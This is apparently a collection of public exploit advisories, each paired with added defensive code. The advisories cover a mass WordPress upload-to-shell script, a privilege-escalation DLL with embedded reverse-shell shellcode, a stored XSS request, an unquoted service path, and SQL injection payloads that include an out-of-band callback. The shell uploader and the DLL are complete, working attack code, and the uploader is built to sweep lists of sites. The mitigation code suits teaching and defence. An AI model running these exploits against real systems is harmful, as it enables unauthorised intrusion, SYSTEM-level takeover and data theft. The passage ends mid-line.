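    row = DB.execute(
        "SELECT email FROM users WHERE email=? AND password=?", (email, password)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    print(login_vulnerable("test@gmail.com' OR 1=1-- -", "test"))   # admin@example.com
    print(login_fixed("test@gmail.com' OR 1=1-- -", "test"))        # None
```

With the comment in place the vulnerable query degenerates to WHERE email='...' OR 1=1, which returns the first row of the table, typically the administrator created at install time.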
<pre><code># Exploit Title: Wordpress Plugin - Membership For WooCommerce < v2.1.7 - Arbitrary File Upload to Shell (Unauthenticated)<br /># Date: 2024-02-25<br /># Author: Milad Karimi (Ex3ptionaL)<br /># Category : webapps<br /># Tested on: windows 10 , firefox<br /><br />import requests<br />from multiprocessing.dummy import Pool<br />from colorama import Fore<br />from colorama import init<br />init(autoreset=True)<br /><br /># colour shortcuts (the original used fg/fr/fm without defining them)<br />fg = Fore.GREEN<br />fr = Fore.RED<br />fm = Fore.MAGENTA<br /><br />headers = {<br />    'Connection': 'keep-alive',<br />    'Cache-Control': 'max-age=0',<br />    'Upgrade-Insecure-Requests': '1',<br />    'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36',<br />    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',<br />    'Accept-Encoding': 'gzip, deflate',<br />    'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',<br />    'referer': 'www.google.com',<br />}<br /><br /># GIF89a polyglot: the image magic bytes sit at offset 0 so a magic-number<br /># check passes, while the .php name makes the server execute the tail.<br />uploader = """GIF89a<br /><?php ?><br /><!DOCTYPE html><br /><html><br /><head><br />    <title>Resultz</title><br /></head><br /><body><h1>Uploader</h1><br />    <form enctype='multipart/form-data' action='' method='POST'><br />        <p>Uploaded</p><br />        <input type='file' name='uploaded_file'></input><br /><br /><br />        <input type='submit' value='Upload'></input><br />    </form><br /></body><br /></html><br /><?PHP<br />// same logic as the original base64-obfuscated body, decoded for readability<br />if (!empty($_FILES['uploaded_file'])) {<br />    $path = './' . basename($_FILES['uploaded_file']['name']);<br />    if (move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $path)) {<br />        echo 'The file ' . basename($_FILES['uploaded_file']['name']) . ' has been uploaded';<br />    } else {<br />        echo 'There was an error uploading the file, please try again!';<br />    }<br />}<br />?><br />"""<br /><br />requests.urllib3.disable_warnings()<br /><br />UPLOAD = '/wp-admin/admin-ajax.php?action=wps_membership_csv_file_upload'<br />SHELL = '/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php'<br /><br /><br />def Exploit(Domain):<br />    try:<br />        if not Domain.startswith(('http://', 'https://')):<br />            Domain = 'http://' + Domain<br />        myup = {'': ('db.php', uploader)}<br />        requests.post(Domain + UPLOAD, files=myup, headers=headers, verify=False, timeout=10)<br />        req1 = requests.get(Domain + SHELL, headers=headers, verify=False, timeout=10)<br />        body = req1.text<br />        # executed shell renders the Uploader form; if the server merely served<br />        # the file as text the PHP open tag would still be in the body<br />        if req1.status_code == 200 and 'Uploader' in body and '<?' not in body:<br />            print(fg + '[+] ' + Domain + ' --> Shell Uploaded')<br />            with open('Shellz.txt', 'a') as out:<br />                out.write(Domain + SHELL + '\n')<br />        else:<br />            print(fr + '[-] ' + Domain + ' --> Not Vulnerable')<br />    except Exception as e:<br />        print(fr + ' -| ' + Domain + ' --> [Failed] ' + str(e))<br /><br /><br />target = open(input(fm + "Site List: "), "r").read().splitlines()<br />mp = Pool(int(input(fm + "Threads: ")))<br />mp.map(Exploit, target)<br />mp.close()<br />mp.join()<br /></code></pre>
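The upload action is reachable without a login and keeps whatever file name the client sends, so a .php file lands under wp-content/uploads where the web server executes it; the GIF89a prefix is there to satisfy any magic-byte check along the way. As an added example, not the plugin's code or the PoC's, here is the server-side check a CSV import endpoint should apply: judge the file by what the web server will do with its name and contents, not by the client's Content-Type or its first bytes. The polyglot bytes below are a constructed copy of the idea, not the PoC's shell body.

```python
import os
import re
import secrets

ALLOWED_EXT = {".csv"}
# <?php, <?= and the short <? tag; PHP recognises the tag case-insensitively.
PHP_OPEN_TAG = re.compile(rb"<\?(php\b|=|\s)", re.I)

# Constructed stand-in for the PoC's polyglot: image magic bytes in front
# of PHP, so a magic-number check passes while the .php name gets it run.
POLYGLOT = (b"GIF89a\n<?php ?>\n<html><body><h1>Uploader</h1></body></html>\n"
            b"<?PHP echo 'The file has been uploaded'; ?>\n")


def check_csv_upload(filename, content):
    """Return (ok, reason) for a file claimed to be a CSV import."""
    name = os.path.basename(filename.replace("\\", "/"))   # drop any path
    stem, ext = os.path.splitext(name)
    if ext.lower() not in ALLOWED_EXT:
        return False, "extension %r not allowed" % ext
    if "." in stem:
        # shell.php.csv: Apache configured with AddHandler (rather than
        # SetHandler) runs PHP for any .php extension, not only the last one
        return False, "double extension"
    if PHP_OPEN_TAG.search(content):
        return False, "PHP open tag in body"
    try:
        content.decode("utf-8")
    except UnicodeDecodeError:
        return False, "not UTF-8 text"
    return True, "ok"


def stored_name():
    """Never keep the client's file name: random name, fixed extension."""
    return secrets.token_hex(8) + ".csv"


if __name__ == "__main__":
    print(check_csv_upload("db.php", POLYGLOT))
    print(check_csv_upload("members.csv", b"email,plan\nalice@example.com,gold\n"))
```

The content checks matter even with the extension allowlist: a .csv containing a PHP open tag is harmless on its own but becomes a shell the moment a later local-file-inclusion bug or a misconfigured handler touches it, so it is cheaper to refuse it at upload time.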
<pre><code># Title: SUPERAntiSpyware Professional X Version <=10.0.1264 "version.dll" Local Privilege Escalation<br /># Date: 03.04.2024<br /># Author: M. Akil Gündoğan<br /># Vendor Homepage: https://superantispyware.com/<br /># Version: 10.0.1262 and the latest version, 10.0.1264<br /># Tested on: Windows 10 Professional x64<br /># PoC Video: https://youtu.be/FM5XlZPdvdo<br /># CVE ID: CVE-2024-27518<br /><br /># Vulnerability Description:<br />--------------------------------------<br />SUPERAntiSpyware Professional X 10.0.1262 and 10.0.1264 are vulnerable to local privilege escalation: an unprivileged user can make the product restore a malicious DLL from quarantine into "C:\Program Files\SUPERAntiSpyware" through an NTFS directory junction, as demonstrated with a crafted version.dll that the product detects as malware. Since SASCore64.exe loads "version.dll" from its own directory before the system copy (DLL hijacking), a shell is obtained as NT AUTHORITY\SYSTEM after the next reboot.<br /><br />Technical details and step-by-step Proof of Concept (PoC):<br /><br />1 - Build a malicious version.dll that runs shellcode from DllMain and forwards the real version.dll exports (DLLMain.cpp below).<br /><br />2 - If the version.dll containing the shellcode is not already detected by SUPERAntiSpyware, append a file that is detected with "copy /b version_created.dll + malicious.zip version.dll". The PE loader ignores trailing data, so the DLL still loads, but the scanner now flags it and will quarantine it.<br /><br />3 - Create a new folder, copy the prepared "version.dll" into it and scan the folder; SUPERAntiSpyware quarantines the DLL, and that folder is where a restore will put it back.<br /><br />4 - Using "CreateMountPoint.exe" from Google Project Zero's "Symbolic Link Testing" tools, replace the folder from step 3 with a mount point (directory junction) whose target is "C:\Program Files\SUPERAntiSpyware". These tools are available at https://github.com/googleprojectzero/symboliclink-testing-tools; "mklink /J" creates the same kind of junction without them.<br /><br />5 - Restore the quarantined "version.dll": it is written through the junction into SUPERAntiSpyware's directory. After the system reboots, SASCore64.exe loads "version.dll", the shellcode runs and opens a session with NT AUTHORITY\SYSTEM privileges for the attacker.<br /><br /># Mitigations:<br />--------------------------------------<br />We recommend uninstalling SUPERAntiSpyware until the vulnerability is fixed.<br /><br /># Timeline:<br />--------------------------------------<br />- 18.02.2024 - Vulnerability reported via email; the vendor refused to fix it.<br />- 03.04.2024 - Full disclosure.<br /><br /># References<br />--------------------------------------<br />- Vendor: https://www.superantispyware.com/<br />- CVE: https://www.cve.org/CVERecord?id=CVE-2024-27518<br />- Repository: https://github.com/secunnix/CVE-2024-27518/<br /><br /># DLLMain:<br />-------------------------------------------------------------------------------------------------------------------------<br /><br />/* SUPERAntiSpyware LPE "version.dll" DLLMain.cpp<br />M. Akil GUNDOGAN (0xr3act0r) - Secunnix Vulnerability Research Team<br />Special Thanks: Safa Karakus and Samet Gozet<br /><br />If the version.dll containing the shellcode is not already detected by SUPERAntiSpyware,<br />it is combined with another malicious file in ".zip" with the command "copy /b version_created.dll + malicious.zip version.dll"<br />to be detected as malicious. 
In this way, the created ".dll" file can be detected as malicious by SUPERAntiSpyware and quarantined.<br /><br />Compile as release x64 DLL.<br />*/<br /><br />#include "windows.h"<br />#include "ios"<br />#include "fstream"<br />#include <iostream><br /><br />#pragma once<br />#pragma comment(linker,"/export:GetFileVersionInfoA=c:\\windows\\system32\\version.GetFileVersionInfoA,@1")<br />#pragma comment(linker,"/export:GetFileVersionInfoByHandle=c:\\windows\\system32\\version.GetFileVersionInfoByHandle,@2")<br />#pragma comment(linker,"/export:GetFileVersionInfoExA=c:\\windows\\system32\\version.GetFileVersionInfoExA,@3")<br />#pragma comment(linker,"/export:GetFileVersionInfoExW=c:\\windows\\system32\\version.GetFileVersionInfoExW,@4")<br />#pragma comment(linker,"/export:GetFileVersionInfoSizeA=c:\\windows\\system32\\version.GetFileVersionInfoSizeA,@5")<br />#pragma comment(linker,"/export:GetFileVersionInfoSizeExA=c:\\windows\\system32\\version.GetFileVersionInfoSizeExA,@6")<br />#pragma comment(linker,"/export:GetFileVersionInfoSizeExW=c:\\windows\\system32\\version.GetFileVersionInfoSizeExW,@7")<br />#pragma comment(linker,"/export:GetFileVersionInfoSizeW=c:\\windows\\system32\\version.GetFileVersionInfoSizeW,@8")<br />#pragma comment(linker,"/export:GetFileVersionInfoW=c:\\windows\\system32\\version.GetFileVersionInfoW,@9")<br />#pragma comment(linker,"/export:VerFindFileA=c:\\windows\\system32\\version.VerFindFileA,@10")<br />#pragma comment(linker,"/export:VerFindFileW=c:\\windows\\system32\\version.VerFindFileW,@11")<br />#pragma comment(linker,"/export:VerInstallFileA=c:\\windows\\system32\\version.VerInstallFileA,@12")<br />#pragma comment(linker,"/export:VerInstallFileW=c:\\windows\\system32\\version.VerInstallFileW,@13")<br />#pragma comment(linker,"/export:VerLanguageNameA=c:\\windows\\system32\\version.VerLanguageNameA,@14")<br />#pragma comment(linker,"/export:VerLanguageNameW=c:\\windows\\system32\\version.VerLanguageNameW,@15")<br />#pragma 
comment(linker,"/export:VerQueryValueA=c:\\windows\\system32\\version.VerQueryValueA,@16")<br />#pragma comment(linker,"/export:VerQueryValueW=c:\\windows\\system32\\version.VerQueryValueW,@17")<br /><br />// Shellcode: msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.109 LPORT=4444 -f c<br />unsigned char shellcode[] =<br />"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"<br />"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"<br />"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"<br />"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"<br />"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"<br />"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"<br />"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"<br />"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"<br />"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"<br />"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"<br />"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"<br />"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"<br />"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"<br />"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"<br />"\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33"<br />"\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00"<br />"\x00\x49\x89\xe5\x49\xbc\x02\x00\x11\x5c\xc0\xa8\x01\x6d"<br />"\x41\x54\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07"<br />"\xff\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29"<br />"\x80\x6b\x00\xff\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48"<br />"\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea"<br />"\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89"<br />"\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5\x48\x81"<br />"\xc4\x40\x02\x00\x00\x49\xb8\x63\x6d\x64\x00\x00\x00\x00"<br />"\x00\x41\x50\x41\x50\x48\x89\xe2\x57\x57\x57\x4d\x31\xc0"<br />"\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44\x24\x54\x01\x01"<br 
/>"\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6\x56\x50\x41"<br />"\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff\xc8\x4d"<br />"\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5\x48"<br />"\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff"<br />"\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff\xd5"<br />"\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"<br />"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5";<br /><br /><br />VOID shellcodeExecute() {<br /> ShowWindow(GetConsoleWindow(), SW_HIDE);<br /><br /> HANDLE mem_handle = CreateFileMappingA(INVALID_HANDLE_VALUE, NULL, PAGE_EXECUTE_READWRITE, 0, sizeof(shellcode), NULL);<br /><br /> void* mem_map = MapViewOfFile(mem_handle, FILE_MAP_ALL_ACCESS | FILE_MAP_EXECUTE, 0x0, 0x0, sizeof(shellcode));<br /><br /> std::memcpy(mem_map, shellcode, sizeof(shellcode));<br /><br /> std::cout << ((int(*)())mem_map)() << std::endl;<br />}<br /><br />BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)<br />{<br /> switch (fdwReason)<br /> {<br /> case DLL_PROCESS_ATTACH:<br /> shellcodeExecute();<br /> break;<br /> case DLL_THREAD_ATTACH:<br /> break;<br /> case DLL_THREAD_DETACH:<br /> break;<br /> case DLL_PROCESS_DETACH:<br /> break;<br /> }<br /> return TRUE;<br />}<br /><br /></code></pre>
<pre><code># Exploit Title: Wordpress Plugin Alemha Watermarker 1.3.1 - Stored Cross-Site Scripting (XSS)<br /># Date: 22 March 2024<br /># Exploit Author: Erdemstar<br /># Vendor: https://wordpress.com/<br /># Version: 1.3.1<br /><br /># Proof Of Concept:<br />1. Click Add New Watermark and enter the XSS payload into the Watermark Text.<br />2. Stored XSS will run on anyone who wants to edit this page.<br /><br /># Vulnerable Property: watermark_title<br /># PoC Video: https://youtu.be/XEe0Sno6e2g?si=mcgO6VbAwymGXcCp<br /># Request:<br />POST /wp-admin/post.php HTTP/2<br />Host: erdemstar.local<br />Cookie: wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=Attacker%7C1711297520%7CVlz1u8etD9HWW066CNCiUHaGUmSK3WLtvpSKgHVMtzP%7C50573cb574c70a41a241cb9f1f1e3ff22f539fc8630599f2503d02a6c1a7e678; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wp-settings-time-4=1711124335; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=Attacker%7C1711297520%7CVlz1u8etD9HWW066CNCiUHaGUmSK3WLtvpSKgHVMtzP%7Cdae14d9d9aa7f0c4df03783bb2bd321a5b3d6a63d8c3e1ae131dda689c595862; wp-settings-time-5=1711124723<br />Content-Length: 1460<br />Upgrade-Insecure-Requests: 1<br />Origin: https://erdemstar.local<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Referer: https://erdemstar.local/wp-admin/post-new.php?post_type=watermark&wp-post-new-reload=true<br />Accept-Encoding: gzip, deflate, br<br />Accept-Language: en-US,en;q=0.9<br />Priority: u=0, i<br /><br 
/>_wpnonce=99a1d1e63a&_wp_http_referer=%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dwatermark&user_ID=5&action=editpost&originalaction=editpost&post_author=5&post_type=watermark&original_post_status=auto-draft&referredby=https%3A%2F%2Ferdemstar.local%2Fwp-admin%2Fedit.php%3Fpost_type%3Dwatermark&_wp_original_http_referer=https%3A%2F%2Ferdemstar.local%2Fwp-admin%2Fedit.php%3Fpost_type%3Dwatermark&auto_draft=1&post_ID=35&meta-box-order-nonce=ea875c0c6f&closedpostboxesnonce=d29be25ad8&post_title=&samplepermalinknonce=1e667edd3a&wp-preview=&hidden_post_status=draft&post_status=draft&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=03&jj=22&aa=2024&hh=16&mn=25&ss=23&hidden_mm=03&cur_mm=03&hidden_jj=22&cur_jj=22&hidden_aa=2024&cur_aa=2024&hidden_hh=16&cur_hh=16&hidden_mn=25&cur_mn=25&original_publish=Publish&publish=Publish&tax_input%5BCategories%5D%5B%5D=0&post_name=&custom_meta_box_nonce=d1322f94a0&watermark_title=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&img_sizes%5B%5D=thumbnail&img_sizes%5B%5D=medium&img_sizes%5B%5D=large&img_sizes%5B%5D=full&txt_type=ARIAL.TTF&rgb=38%2C1%2C24&txt_size=8&color=%23260118&rotation=&opicity=100&position=top&destance_x=&mesaure_x=px&padding=&mesaure_y=px&background=yes&rgb_bg=255%2C0%2C0&bg_destance_x=&bg_padding=&color_bg=%23ff0000&image=&img_rotation=&img_opicity=100&img_position=top&img_size=4&img_destance_x=&img_mesaure_x=px&img_padding=&img_mesaure_y=px<br /> <br /><br /><br /></code></pre>
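The request above stores `watermark_title` with the value `"><script>alert(document.cookie)</script>` and the advisory states it executes for anyone who edits the watermark. The following is an added example, not code from the Alemha Watermarker plugin or from the advisory author, showing the output-encoding fix for that sink. It assumes the plugin's edit screen echoes the stored title into an `<input value="...">` attribute; `html.escape()` stands in for WordPress's `esc_attr()`, which performs the same attribute-context encoding. The parser at the end checks what a browser would actually see in each case.

```python
"""Output encoding for a stored value rendered into an HTML attribute.

Added example, not code from the Alemha Watermarker plugin or the advisory author.
Assumption: the plugin's edit screen echoes the saved watermark_title into an
<input value="..."> attribute; html.escape() stands in here for WordPress's
esc_attr(), which performs the same attribute-context encoding.
"""
import html
from html.parser import HTMLParser

# The stored payload from the advisory's request body, URL-decoded.
STORED_TITLE = '"><script>alert(document.cookie)</script>'


def render_unescaped(title):
    """Vulnerable pattern: the raw stored value is spliced into the attribute."""
    return f'<input type="text" name="watermark_title" value="{title}">'


def render_escaped(title):
    """Fixed pattern: encode for the attribute context before splicing.
    quote=True also converts the double quote, so the value cannot end the
    attribute early; WordPress code would call esc_attr($title) here."""
    return f'<input type="text" name="watermark_title" value="{html.escape(title, quote=True)}">'


class _Collector(HTMLParser):
    """Records every start tag and the value= of each <input>, as a browser would parse them."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.input_values = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            # HTMLParser already decodes &quot; &lt; etc. inside attribute values
            self.input_values.extend(v for k, v in attrs if k == "value")


def _parse(markup):
    parser = _Collector()
    parser.feed(markup)
    parser.close()
    return parser


def script_tag_count(markup):
    """How many <script> elements the markup really contains once parsed."""
    return _parse(markup).tags.count("script")


def rendered_input_value(markup):
    """The attribute value the browser puts in the text box (None if no value= attribute)."""
    values = _parse(markup).input_values
    return values[0] if values else None


if __name__ == "__main__":
    for name, render in (("unescaped", render_unescaped), ("escaped", render_escaped)):
        markup = render(STORED_TITLE)
        print(f"{name}: script tags={script_tag_count(markup)} "
              f"input value={rendered_input_value(markup)!r}")
```

With the raw splice, the stored string closes the `value` attribute and the parser sees a real `<script>` element; with attribute encoding the same string survives intact as the text-box contents and no element is created. Encoding must match the context: a value placed in a JavaScript string or a URL needs the corresponding encoder, not `esc_attr()`.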
<pre><code># Exploit Title: ESET NOD32 Antivirus 17.0.16.0 - Unquoted Service Path<br /># Exploit Author: Milad Karimi (Ex3ptionaL)<br /># Exploit Date: 2024-04-01<br /># Vendor : https://www.eset.com<br /># Version : 17.0.16.0<br /># Tested on OS: Microsoft Windows 10 pro x64<br /><br />C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"<br />|findstr /i /v "c:\windows\\" |findstr /i /v """<br /><br />ESET Updater ESETServiceSvc C:\Program Files (x86)\ESET\ESET<br />Security\ekrn.exe<br /><br />C:\>sc qc ekrn<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: ekrn<br /> TYPE : 20 WIN32_SHARE_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : "C:\Program Files\ESET\ESET Security\ekrn.exe"<br /> LOAD_ORDER_GROUP : Base<br /> TAG : 0<br /> DISPLAY_NAME : ESET Service<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br />C:\>systeminfo<br /><br />OS Name: Microsoft Windows 10 Pro<br />OS Version: 10.0.19045 N/A Build 19045<br />OS Manufacturer: Microsoft Corporation<br /></code></pre>
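The `findstr` pipeline above approximates the unquoted-service-path rule by filtering out entries under `c:\windows\` and entries containing a double quote. The block below is an added example, not ESET's code or the advisory author's, that applies the rule directly to service records and emits the `sc config ... binPath=` remediation that quotes the executable while preserving its arguments. The records are constructed; the first two mirror the two forms of the `ekrn` path that appear in the advisory, unquoted in the `wmic` listing and quoted in the `sc qc` output. A quoted `BINARY_PATH_NAME` is not ambiguous, so the check has to be applied to the string exactly as the service database stores it.

```python
"""Unquoted service path audit.

Added example, not ESET's code or the advisory author's. The records below are
constructed; the first two mirror the two forms of the ekrn path shown in the
advisory. The rule checked is the one Windows applies when it starts a service
whose BINARY_PATH_NAME is unquoted: a path containing spaces is ambiguous only
when it is not enclosed in double quotes.
"""
import re

SERVICE_RECORDS = [
    # (service name, BINARY_PATH_NAME) -- constructed sample data
    ("ekrn", r"C:\Program Files (x86)\ESET\ESET Security\ekrn.exe"),   # as in the wmic listing
    ("ekrn", r'"C:\Program Files\ESET\ESET Security\ekrn.exe"'),        # as in the sc qc output
    ("agentsvc", r"C:\Program Files\Example Vendor\agent.exe -k netsvc"),
    ("toolsvc", r"C:\Tools\agent.exe --serve"),
    ("svchost", r"C:\Windows\system32\svchost.exe -k LocalService"),
]

# Unquoted command line: the executable ends at the first ".exe"; anything after
# a following whitespace character is the argument string.
_EXE_SPLIT = re.compile(r"^(?P<exe>.+?\.exe)(?P<args>\s.*)?$", re.IGNORECASE)


def split_command_line(pathname):
    """Return (executable_path, arguments, was_quoted) for one BINARY_PATH_NAME."""
    s = pathname.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        if end == -1:
            raise ValueError(f"unterminated quote in {pathname!r}")
        return s[1:end], s[end + 1:], True
    m = _EXE_SPLIT.match(s)
    if m is None:  # no .exe token: treat the whole string as the path
        return s, "", False
    return m.group("exe"), m.group("args") or "", False


def is_unquoted_with_spaces(pathname):
    """True when the record is ambiguous: unquoted and the path contains a space."""
    exe, _args, quoted = split_command_line(pathname)
    return not quoted and " " in exe


def remediation_command(name, pathname):
    """The sc config line that quotes the executable and keeps its arguments,
    or None when the record is already safe. Inner quotes are backslash-escaped,
    which is how sc.exe expects a quoted value inside binPath= on cmd.exe."""
    exe, args, quoted = split_command_line(pathname)
    if quoted or " " not in exe:
        return None
    fixed = f'"{exe}"{args}'
    escaped = fixed.replace('"', '\\"')
    return f'sc config {name} binPath= "{escaped}"'


def audit(records):
    """Return [(service name, remediation command)] for every ambiguous record."""
    findings = []
    for name, pathname in records:
        cmd = remediation_command(name, pathname)
        if cmd is not None:
            findings.append((name, cmd))
    return findings


if __name__ == "__main__":
    for name, cmd in audit(SERVICE_RECORDS):
        print(f"{name}: {cmd}")
```

Only the unquoted `Program Files` entries are reported; the quoted `ekrn` record, the space-free `C:\Tools` path and the `svchost` line pass. Beyond quoting the path, the durable control is that no unprivileged account holds write access to any directory along a service binary's path, which is an ACL review rather than a string check.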
<pre><code># Title: Computer Laboratory Management System v1.0 - Multiple-SQLi<br /># Author: nu11secur1ty<br /># Date: 03/28/2024<br /># Vendor: https://github.com/oretnom23<br /># Software: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#comment-104400<br /># Reference: https://portswigger.net/web-security/sql-injection<br /><br /># Description:<br />The id parameter appears to be vulnerable to SQL injection attacks.<br />The payload '+(select<br />load_file('\\\\95ctkydmc3d4ykhxxtph7p6xgomiagy71vsij68.tupgus.com\\mpk'))+'<br />was submitted in the id parameter. This payload injects a SQL<br />sub-query that calls MySQL's load_file function with a UNC file path<br />that references a URL on an external domain. The application<br />interacted with that domain, indicating that the injected SQL query<br />was executed. The attacker can get all information from the system by<br />using this vulnerability!<br /><br />STATUS: HIGH- Vulnerability<br /><br />[+]Payload:<br />```mysql<br />---<br />Parameter: id (GET)<br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY<br />or GROUP BY clause<br /> Payload: page=user/manage_user&id=7''' RLIKE (SELECT (CASE WHEN<br />(2375=2375) THEN 0x372727 ELSE 0x28 END)) AND 'fkKl'='fkKl<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: page=user/manage_user&id=7''' AND (SELECT 1734<br />FROM(SELECT COUNT(*),CONCAT(0x716a707071,(SELECT<br />(ELT(1734=1734,1))),0x71717a7871,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CYrv'='CYrv<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: page=user/manage_user&id=7''' AND (SELECT 6760 FROM<br />(SELECT(SLEEP(7)))iMBe) AND 'xzwU'='xzwU<br /><br /> Type: UNION query<br /> Title: MySQL UNION query (NULL) - 11 columns<br /> Payload: page=user/manage_user&id=-2854' UNION ALL SELECT<br />NULL,NULL,NULL,NULL,CONCAT(0x716a707071,0x6675797766656155594373736b724a5a6875526f6f65684562486c48664e4d624f75766b4a444b43,0x71717a7871),NULL,NULL,NULL,NULL,NULL,NULL#<br />---<br /><br /><br /></code></pre>
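Every payload class listed above (boolean-based, error-based, time-based, UNION) works because the `id` value is spliced into the statement text, so a stray quote changes the statement's grammar. The block below is an added example, not code from the Computer Laboratory Management System, that puts the spliced lookup next to a validated, parameterised one and classifies what each does with a normal id, with the advisory's `7'''` prefix, and with a true/false pair of the kind a boolean-based probe relies on. The application is PHP on MySQL; the standard-library `sqlite3` module stands in so the block runs offline, and the `users` table and its rows are constructed.

```python
"""Integer id lookup: spliced vs. parameterised.

Added example, not code from the Computer Laboratory Management System. The
application is PHP on MySQL; sqlite3 from the standard library stands in so the
block runs offline, and the users table and rows are constructed.
"""
import re
import sqlite3


def make_db():
    """Constructed in-memory table standing in for the application's users table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)", [(7, "alice"), (8, "bob")])
    return con


def lookup_spliced(con, user_id):
    """Vulnerable pattern: the request parameter becomes part of the SQL text,
    which is what lets id=7''' alter the statement instead of being data."""
    sql = f"SELECT username FROM users WHERE id = '{user_id}'"
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def lookup_parameterised(con, user_id):
    """Fixed pattern: reject anything that is not a decimal integer, then bind
    the value as a parameter so the database never parses it as SQL. The PHP
    equivalents are mysqli prepare()/bind_param('i', ...) or PDO bindValue()
    with PDO::PARAM_INT."""
    text = str(user_id)
    if re.fullmatch(r"[0-9]+", text) is None:   # [0-9] rather than \d: no Unicode digits
        raise ValueError("id must be a decimal integer")
    row = con.execute("SELECT username FROM users WHERE id = ?", (int(text),)).fetchone()
    return row[0] if row else None


def probe(lookup, user_id):
    """Run one lookup against a fresh database and classify the outcome as
    ('row', username or None), ('db-error', exception name) or ('rejected', None)."""
    con = make_db()
    try:
        return ("row", lookup(con, user_id))
    except sqlite3.Error as exc:
        return ("db-error", type(exc).__name__)
    except ValueError:
        return ("rejected", None)
    finally:
        con.close()


INPUTS = [
    "7",               # legitimate request
    "7'''",            # the advisory's injection prefix: unbalanced quoting
    "7' AND '1'='1",   # a true/false pair: the boolean-based technique the
    "7' AND '1'='2",   #   advisory lists needs these two to behave differently
]

if __name__ == "__main__":
    for value in INPUTS:
        print(f"{value!r:20} spliced={probe(lookup_spliced, value)!s:34} "
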